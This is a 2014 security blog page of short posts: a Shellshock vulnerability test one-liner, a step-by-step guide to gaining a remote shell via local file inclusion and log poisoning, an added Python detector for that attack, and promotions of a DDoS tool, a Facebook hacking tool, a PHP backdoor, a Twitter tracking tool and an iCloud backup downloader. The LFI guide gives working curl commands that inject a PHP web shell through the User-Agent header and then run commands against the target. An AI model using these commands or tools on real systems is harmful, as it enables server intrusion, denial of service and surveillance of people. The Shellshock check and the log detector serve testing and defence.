
Sep 30, 2014

Shellshock Test List

CVE-2014-6271

env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id


CVE-2014-7169

will create a file named echo in cwd with date in it, if vulnerable

CVE-2014-7186

CVE-2014-7187

 

CVE-2014-6277


Source:
https://github.com/mubix/shellshocker-pocs 
https://github.com/hannob/bashcheck



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Videos: Black Hat USA 2014

https://www.youtube.com/playlist?list=UUbbgnifxfH-nqx6z9XQ963Q

 


Sep 23, 2014

Tools: DAWIN - Distributed Audit & Wireless Intrusion Notification


DA-WIN (pronounced DARWIN) is the evolution of wireless security scanning. Developed by a team that had a significant impact on the field of 802.11 security, it embraces the truism that most organisations don't like or embrace network IDS technology and so are unlikely to welcome, invest in or support an IDS implementation in a more specialised area like Wi-Fi.
Scanning is a costly regulatory requirement for many, yet it often provides little security protection because it only measures the threat on 4 or 5 days a year. How many CIOs would be happy with a firewall or anti-virus that worked for 1 week in 52?




Tools: UFONet - DDoS Tool

UFONet is a tool designed to launch DDoS attacks against a target, using 'Open Redirect' vectors on third-party web applications, like a botnet.


Source: http://ufonet.sourceforge.net/


Tools: Facebook Hacking Tool

Facebook Hacking Tool
Python --version 2.7.3 (Windows/Linux)
IMPORTS:
Matplotlib-1.2.1 Networkx-1.8.1 Numpy-1.7.1 Pygraphviz-1.1 Simplejson-3.3.0 Mechanize-0.2.5 Other: gephi-0.8.2-beta (Graphs software)
Recommendation: Use setuptools for the dependencies
OS: Working on Windows 7 64/32 bits. Working on Kali Linux (Yeah, sucks) but probably works on the others (deprecated - read below)
Usage: python main.py


Source: https://github.com/chinoogawa/fbht



Sep 22, 2014

Howto: Remote Shell PHP via LFI

1. Find the LFI vulnerability in the website.

2. Inject a web shell into the log file through the User-Agent or X-Forwarded-For header, or any other field that the logger records.
# curl -s -A '<?php system($_GET['cmd']); ?>' 'http://target.com/' -o /dev/null
 
3. Once the web shell is injected, try it with any command such as id, pwd or ls.
# curl -s 'http://target.com/include.php?page=../../../../../../var/log/access.log&cmd=id'

4. Now you're ready to get a remote shell that behaves as if you were interacting directly with target.com's shell. (Run this in our shell.)
# while true; do read -p 'cmd>' cmd; cmd=$(php -r "echo urlencode('$cmd');"); curl -s "http://target.com/include.php?page=../../../../../../var/log/access.log&cmd=$cmd" ; done

5. Now you will be requesting "http://target.com/include.php?page=../../../../../../var/log/access.log&cmd=" and sending commands continuously, as if you were on target.com.
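
Both stages of this procedure leave traces in the very access log that the include reads. The detection sketch below is an added example, not part of the original post; the sample log lines, client addresses and rule names are constructed for illustration, and it assumes the Apache/nginx "combined" log format (X-Forwarded-For is only covered if your log format records it in one of the quoted fields).

```python
import re
from urllib.parse import parse_qsl

# Combined log format: ip - user [time] "request" status bytes "referer" "agent"
FIELD = r'"((?:[^"\\]|\\.)*)"'
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] ' + FIELD + r' \d{3} \S+ ' + FIELD + ' ' + FIELD)
PHP_TAG = re.compile(r'<\?(?:php|=)', re.I)       # PHP open tag stored in a logged field
TRAVERSAL = re.compile(r'\.\.[/\\]')              # ../ or ..\ after URL decoding
LOG_PATH = re.compile(r'/var/log/|\.log$', re.I)  # parameter value resolves to a log file

# Constructed sample lines (documentation address ranges, no real hosts).
SAMPLE_LOG = [
    '198.51.100.7 - - [22/Sep/2014:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [22/Sep/2014:10:01:13 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php system($_GET[cmd]); ?>"',
    '203.0.113.9 - - [22/Sep/2014:10:01:40 +0000] "GET /include.php?page=../../../../../../var/log/access.log&cmd=id HTTP/1.1" 200 4096 "-" "curl/7.38.0"',
    '198.51.100.7 - - [22/Sep/2014:10:02:00 +0000] "GET /include.php?page=about HTTP/1.1" 200 900 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.44 - - [22/Sep/2014:10:03:05 +0000] "GET /include.php?page=..%2F..%2F..%2Fvar%2Flog%2Faccess.log HTTP/1.1" 200 4096 "-" "curl/7.38.0"',
]

def findings(lines):
    """Return (line_no, client_ip, rule) for each suspicious log line."""
    out = []
    for no, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not in combined format; skipped rather than guessed at
        ip, request, referer, agent = m.groups()
        # Stage 1: PHP code written into a field the server copies to its log.
        if any(PHP_TAG.search(f) for f in (request, referer, agent)):
            out.append((no, ip, "php-in-logged-field"))
        # Stage 2: a query parameter that traverses directories to a log file.
        target = (request.split(" ") + [""])[1]
        query = target.partition("?")[2]
        for _, value in parse_qsl(query, keep_blank_values=True):  # percent-decodes
            if TRAVERSAL.search(value) and LOG_PATH.search(value):
                out.append((no, ip, "log-file-inclusion"))
                break
    return out

def both_stages(found):
    """Client IPs that appear in both the injection and the inclusion stage."""
    injected = {ip for _, ip, rule in found if rule == "php-in-logged-field"}
    included = {ip for _, ip, rule in found if rule == "log-file-inclusion"}
    return sorted(injected & included)

if __name__ == "__main__":
    hits = findings(SAMPLE_LOG)
    print(hits, both_stages(hits))
```

A hit on the second rule with a 200 response is the higher-priority alert, since it means the application resolved a user-supplied path outside its intended directory regardless of whether the log was poisoned first.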




Sep 20, 2014

Tools: WebPwn3r - Web Applications Security Scanner.

In its current public [Demo] version, WebPwn3r has the following features:
1- Scan a URL or list of URLs.
2- Detect and exploit Remote Code Injection vulnerabilities.
3- Detect and exploit Remote Command Execution vulnerabilities.
4- Detect and exploit SQL Injection vulnerabilities.
5- Detect and exploit typical XSS vulnerabilities.
6- Detect WebKnight WAF.
7- Improved payloads to bypass security filters/WAFs.
8- Fingerprint the backend technologies.

Source: https://github.com/zigoo0/webpwn3r



Sep 18, 2014

Tools: PoisonShell PHP Backdoor

PoisonShell is a simple PHP shell that has several options

Source: http://packetstormsecurity.com/files/128249/poison.zip


Tools: tinfoleak – Get detailed information about a Twitter user activity



tinfoleak is a simple Python script that allows you to obtain:
  • basic information about a Twitter user (name, picture, location, followers, etc.)
  • devices and operating systems used by the Twitter user
  • applications and social networks used by the Twitter user
  • place and geolocation coordinates to generate a tracking map of locations visited
  • show user tweets in Google Earth!
  • download all pics from a Twitter user
  • hashtags used by the Twitter user and when they are used (date and time)
  • user mentions by the Twitter user and when they occurred (date and time)
  • topics used by the Twitter user
You can filter all the information by:
  • start date / time
  • end date / time
  • keywords


Source: http://vicenteaguileradiaz.com/tools/


Sep 16, 2014

Tools: iLoot - Download backup of device from iCloud


Using this CLI tool you can download backups of devices assigned to your AppleID. Based on iphone-dataprotection script, so copyrights belong to respective owners. Offset operations added and other minor bugs fixed.

Source: https://github.com/hackappcom/iloot

 
